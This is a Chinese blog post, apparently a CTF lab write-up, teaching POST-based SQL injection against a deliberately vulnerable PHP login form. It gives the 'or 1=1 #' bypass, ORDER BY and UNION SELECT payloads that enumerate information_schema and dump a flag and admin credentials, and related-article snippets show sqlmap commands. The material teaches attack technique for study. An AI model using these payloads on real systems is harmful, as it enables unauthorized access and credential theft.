POST注入

最新推荐文章于 2024-05-21 08:03:35 发布
最新推荐文章于 2024-05-21 08:03:35 发布
阅读量1.6k 收藏 3
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790675/article/details/109258131
版权

POST注入

一、POST注入介绍

注入攻击的本质是把用户输入的数据当做代码执行,POST注入一般会在表单的地方。
1.有两个关键条件:
①用户能够控制输入
②原本程序要执行的代码拼接了用户输入的数据
2.POST注入高危点:
登录框
查询框
各种和数据库有交互的框
3.最经典的POST注入莫过于万能密码:
’or 1=1 #
万能密码就是引出注入手法,你在登录的时候输入什么都能登录

二、例题

例如第一题
首先在这里插入图片描述
首先我们查看源码在这里插入图片描述

$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
$result = mysqli_query($conn,$sql);

我们会发现直接执行了sql的拼接语句,中间没有任何过滤,所以判断存在SQL注入,所以我们用’闭合$username前的内容,同时注释掉后面的内容,达到和数据库建立连接

'or 1=1 #

select * from user where username='' or 1=1 #
查询user表中username为空的值,或者1=1的值,1=1恒成立所以无论输入什么都会有数据显示

所以第一步我们先用万能密码’or 1=1 #发现存在POST注入
在这里插入图片描述
第二步用order by查字段数

1' or 1=1 order by 1 #
1' or 1=1 order by 2 #
1' or 1=1 order by 3 #

order by 4时结果显示错误,判断有三个字段在这里插入图片描述
第三步判断回显点

'union select 1 #
'union select 1,2 #
'union select 1,2,3 #

得到回显点是2和3
在这里插入图片描述

第四步,我们用database()查询数据库名

'union select 1,2,database() #

得出库名post_error
在这里插入图片描述
第五步查表名

'union select 1,2,table_name from information_schema.tables where table_schema="post_error" limit 0,1#

得出表名flag,user
在这里插入图片描述
在这里插入图片描述
第六步我们查字段名

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 0,1#
...
'union select 1,2,column_name from information_schema.columns where table_name='user' limit 1,1#

'union select 1,2,column_name from information_schema.columns where table_name='user' limit 0,1#

flag表中字段:id,flag
user表中字段:id,username,password
在这里插入图片描述
在这里插入图片描述
第七步我们来查表中数据
将字段依次输入

'union select 1,2,flag from flag limit 0,1#

'union select 1,2,username from user limit 0,1#

查询结果分别为:id from flag-> 1,2,3
flag from flag-> zKaQ-PostK1,zKaQ-XZT,zKaQ-FlagA1
username from user->admin
password from user->as4dsa2dsad2a3

在这里插入图片描述
在这里插入图片描述
成功找到flage为zKaQ-PostK1
在这里插入图片描述

Monkey:
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4610
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
利用sqlmap进行post注入学习笔记
weixin_52034407的博客
03-19 2934
使用sqlmap进行post注入学习笔记
SQL注入post注入
最新发布
banliyaoguai的博客
05-21 756
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
SQL注入---POST注入
zhoutong2323的博客
04-07 780
在Webshell文章中介绍过post提交和get提交的区别,这里不再赘述get方式提交URL中的参数信息,post方式则是将信息保存在HTTP请求的body中传递get提交的参数可以被缓存并会保留在浏览器的历史记录里,post提交不会。get提交最长2048个字符,而post提交没有长度限制综上所述,post方式提交的数据保密性更强,因此登录界面输入的账号密码信息常用post方式提交。
POST登陆框注入
security.blog.cndn.net
03-07 484
1.burpsuite + sqlmap 利用burpsuite抓包保存为txt,利用sqlmap指定文本注入(此方法本人未实战过,是很普遍的方法,详情请自行百度) 注入点:http://www.xx.com/Login.asp sqlmap.py -r test.txt -p Password 2.自动注册表单,截取数据。(直接在后面加[–forms]) sqlmap -u “http://ww...
注入漏洞一把嗦(原理+步骤+防御)
Y22Lee的博客
03-21 1254
以csdn为例,除去请求头信息,剩下的都是Head信息,其中U-A是用户的基本信息,Referer是用户的请求来源。没有回显的注入SQL注入中最繁琐;因为没有明确的回显,所以不能直观的得到数据。只能尝试测出数据。一般盲注分为布尔盲注和时间盲注。宽字节是指占俩个以上字节的字符,而一般的字符只占一个字节,被称作单字节(窄字节)。ASCII:单字节编码GBK,UTF-8:单字节/双字节编码(区别根据范围划分,范围与ASCII保持一致)英文通常是默认占用一个字节,而汉字占用俩个字节!
php中$_GET与$_POST过滤sql注入的方法
01-21
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下: 此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。 主要实现代码如下: 复制代码 代码如下:...
第十二节 POST update语句注入-01
09-15
"POST update语句注入" 在数据库安全领域中,SQL 注入是一种常见的攻击方式,而在 Web 应用程序中,POST 请求也可能存在 SQL 注入漏洞。今天我们将讨论 POST update 语句注入的相关知识点。 MySQL update 介绍 ...
SQLMAP的注入使用
05-13
该命令用于判断目标网站是否存在POST注入漏洞。 GET注入详解: * python sqlmap.py -u "xxxxxxx.com" --dbs 【获取数据库内所有数据库的名称】 该命令用于获取目标网站的所有数据库的名称。 * python sqlmap.py...
POST、Cookie注入扫描和注入工具
03-11
功能慢全的,注入速度飞快!!! 应该会对注入者有所帮助
post表单防止注入
01-22
post表单,这个不知道大家会不会,传上来分享一下,呵呵
13、注入篇-- POST注入
WX公众号-小白学安全
04-05 1504
文章目录原理利用防范靶场 原理 利用 防范 靶场
POST注入(二)
qq_45300786的博客
07-06 448
我们来看一下他的源码 这是POST(一)的源码 $sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\''; 这是POST(二)的源码 $sql = 'select *from user where username =("'.$username.'") and password=("'.$password.'")'; 发现POST(二)把转义单引号(’)变成了双引号("),还加了
SQL注入知识总结v1.0
Monsterlz123的博客
07-14 476
SQL注入SQL注入学习笔记总结 Hello 各位小伙伴周末晚上好~ 话说最近有小伙伴在公众号留言问我: “小编,怎么盗QQ号?” “小编,在某某网站用什么代码就可以免费充值?” “小编,能不能帮我攻击一下某某网站?” 第一步,首先目标得有可以利用的漏洞才行,不存在什么万能代码的… 第二步,第二步之后的行为都是违反网络安全法的!!! 我们要做遵纪守法,维护国家网络安全的白帽子~ 而不是...
POST 注入
晨辰.的博客
03-20 4004
POST 注入
DFX 安全测试-- 告诉你什么是XSS、sql注入POST和GET的区别....
a64910807的博客
02-25 961
1、用户权限测试  (1) 用户权限控制   1) 用户权限控制主要是对一些有权限控制的功能进行验证   2) 用户A才能进行的操作,B是否能够进行操作(可通过窜session,将在下面介绍)   3)只能有A条件的用户才能查看的页面,是否B能够查看(可直接敲URL访问)   (2) 页面权限控制   1) 必须有登陆权限的页面,是否能够在不登陆情况下进行访问   2)...
sqlmap post注入方法
09-20
在使用post注入方法时,可以通过以下步骤进行操作: 1. 使用`-u`参数指定目标URL,例如:`-u "http://xxx.xxx.com/Login.asp"` 2. 使用`--data`参数指定POST请求的数据,例如:`--data "n=1&p=1"` 3. 输入命令`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值